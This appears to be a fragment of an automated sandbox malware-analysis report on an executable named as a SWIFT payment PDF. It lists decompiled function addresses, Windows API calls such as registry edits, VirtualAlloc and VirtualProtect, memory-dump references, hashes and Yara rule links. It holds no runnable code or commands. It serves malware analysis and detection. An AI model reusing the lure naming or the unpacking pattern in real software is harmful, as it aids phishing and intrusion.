                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                      • Instruction ID: 0ac01c35b1a0eb5cd592cd1bd468c7a0eb97994f07403c330b4f6ecb6608de49
                                      • Opcode Fuzzy Hash: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                      • Instruction Fuzzy Hash: 7D01F431628210ABE7194B789C04B6A3698E751359F10C23BF911F76F1D67CDC028B4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004022BE Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022DD
                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseDeleteOpenValue
                                      • String ID:
                                      • API String ID: 849931509-0
                                      • Opcode ID: ed5076af26d7ede7ead91c3adf2758db35427d31b88ed0346b104f9424fd96c5
                                      • Instruction ID: baeefcf9a9db1f94083355b6d21ea7a3e6d609a59d1c11f41be6f028ad682588
                                      • Opcode Fuzzy Hash: ed5076af26d7ede7ead91c3adf2758db35427d31b88ed0346b104f9424fd96c5
                                      • Instruction Fuzzy Hash: DAF0C232A00114ABDB10BBF48F8EEAE72A89B40318F10453BF601B71C1D9FD5E01966E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00000000), ref: 00401579
                                      • ShowWindow.USER32(000103F6), ref: 0040158E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: add7964105dab1707aaaa84d4f0c0e9d1ab12f2020f5d8ceeb3b73bd8940a280
                                      • Instruction ID: ee0513fff25cb1769eb447bdd8d815014c6f46c9afdd248f46aeede14d5c0a9d
                                      • Opcode Fuzzy Hash: add7964105dab1707aaaa84d4f0c0e9d1ab12f2020f5d8ceeb3b73bd8940a280
                                      • Instruction Fuzzy Hash: 95F0553BA082419FD700CB68EC8086E7BE1EB8630171885BBE101A31C1C2B86E00D718
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Window$EnableShow
                                      • String ID:
                                      • API String ID: 1136574915-0
                                      • Opcode ID: 0401fe0a8408a80830016dcf6a5a76bfc0338b17fffd66502b160acb969e5ee0
                                      • Instruction ID: dacfe0cc3fa15e7f928c0b82e119a982ce74a601eef441543fec6a70ee28c1de
                                      • Opcode Fuzzy Hash: 0401fe0a8408a80830016dcf6a5a76bfc0338b17fffd66502b160acb969e5ee0
                                      • Instruction Fuzzy Hash: A9E0C272A04111DBCB10BBB4AE4AA6E33A4EF0035AB104437F202F10D1D6B99C80966E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405825 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405829
                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                      • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                      • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                      • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000279C Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000), ref: 1000285B
                                      • GetLastError.KERNEL32 ref: 10002962
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: AllocErrorLastVirtual
                                      • String ID:
                                      • API String ID: 497505419-0
                                      • Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                      • Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
                                      • Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                      • Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401650 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 59528d37e619a7fd2b218f90b230f1d5c61a58079a8c3501643362a9b53b5bb7
                                      • Instruction ID: c31469945a4911ea426e3239a307804724141ef2c1121085379b225132293f7e
                                      • Opcode Fuzzy Hash: 59528d37e619a7fd2b218f90b230f1d5c61a58079a8c3501643362a9b53b5bb7
                                      • Instruction Fuzzy Hash: 95F0E931B0811593CB20B7768E4DE5F66A4CF81328F24473BB111B21D1DABD8602596F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402239 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringWrite
                                      • String ID:
                                      • API String ID: 390214022-0
                                      • Opcode ID: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                      • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                      • Opcode Fuzzy Hash: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                      • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004025DD Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025F7
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FilePointerwsprintf
                                      • String ID:
                                      • API String ID: 327478801-0
                                      • Opcode ID: c35ba7dfe97b7f48e5b723a9f9add06c677ffe5bf8c734f428c440e5cdc680e9
                                      • Instruction ID: 68826eed314e96b4e4a1de5bbcec91c3173623e2f2413cad3d40aed69504d2cd
                                      • Opcode Fuzzy Hash: c35ba7dfe97b7f48e5b723a9f9add06c677ffe5bf8c734f428c440e5cdc680e9
                                      • Instruction Fuzzy Hash: DDE0DF72A04114ABCB00B7A46E8ACBF776CDB04309B10813BF201F00D2C2BD08015A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403072 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,00000004,00000000,00000000,00000000), ref: 00403089
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                      • Instruction ID: 0981d36ce8a37324ca65ea29ac33eec068edb21049201a101882ec42e2df6d76
                                      • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                      • Instruction Fuzzy Hash: 3FE08C32151119BBCF205E619C08AEB3B5CEB007A6F00C033BA18E5190D630EB149BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B11 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                      • Instruction ID: 2076060dfd2ee921fe50c9635413a5f0d56a6b8cd73322b3d01e2a4deb0b2e86
                                      • Opcode Fuzzy Hash: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                      • Instruction Fuzzy Hash: 39E04F76250108AED700EBA5DD46EA57BDCA704704F008021B608D6091CA78E5508B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100026C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                      • Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                      • Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040227D Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString
                                      • String ID:
                                      • API String ID: 1096422788-0
                                      • Opcode ID: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                      • Instruction ID: 0f98334ba99eddbf462717ac0d7b36237a5f237946376121c7889506776d1579
                                      • Opcode Fuzzy Hash: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                      • Instruction Fuzzy Hash: 31E08630E44244BADB10AFB1CD49AFD7A68AF05710F10403AF9907B0D1EAB894429B1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
